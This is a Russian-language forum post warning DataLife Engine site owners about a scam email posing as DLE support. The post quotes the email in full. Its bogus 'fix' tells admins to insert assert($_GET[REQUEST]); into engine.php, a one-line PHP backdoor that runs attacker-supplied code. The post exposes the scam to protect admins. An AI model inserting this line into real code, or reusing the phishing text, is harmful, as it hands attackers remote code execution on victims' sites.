- 19, Oct 2014
- #1
Школохакеры ищут новые способы взлома сайтов на DLE.
Внимание! Если вы получили письмо следующего содержания:
То ни в коем случае не "исправляйте" уязвимость. Иначе ваш сайт на DLE будет точно подвержен взлому. Движок DLE модернизируется силами разработчиков, становится все более устойчивым к проискам школоло, которые называют себя хакерами, и последние ищут новые возможности для взлома ваших сайтов. Подобные письма шлют мошенники, письма отправляют через обратную форму сайта.
АйПи чаще всего прокси или ТОР. Если вы получили подобное письмо, свяжитесь напрямую со службой поддержки DLE.
Если вы используете нулль, то все фиксы уязвимостей публикуются на официальной странице багов
. Проверьте, есть ли на этой странице подобная информация. Не подвергайте ваш сайт взлому!
Внимание! Если вы получили письмо следующего содержания:
Здравствуйте, уважаемый клиент!
Благодарим Вас за использование на Вашем сайте ***.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».
Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.
По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости.
Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.
Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки:
<?php
добавьте:
assert($_GET[REQUEST]);
С уважением,
Служба поддержки «DataLife Engine»
То ни в коем случае не "исправляйте" уязвимость. Иначе ваш сайт на DLE будет точно подвержен взлому. Движок DLE модернизируется силами разработчиков, становится все более устойчивым к проискам школоло, которые называют себя хакерами, и последние ищут новые возможности для взлома ваших сайтов. Подобные письма шлют мошенники, письма отправляют через обратную форму сайта.
АйПи чаще всего прокси или ТОР. Если вы получили подобное письмо, свяжитесь напрямую со службой поддержки DLE.
Если вы используете нулль, то все фиксы уязвимостей публикуются на официальной странице багов
. Проверьте, есть ли на этой странице подобная информация. Не подвергайте ваш сайт взлому!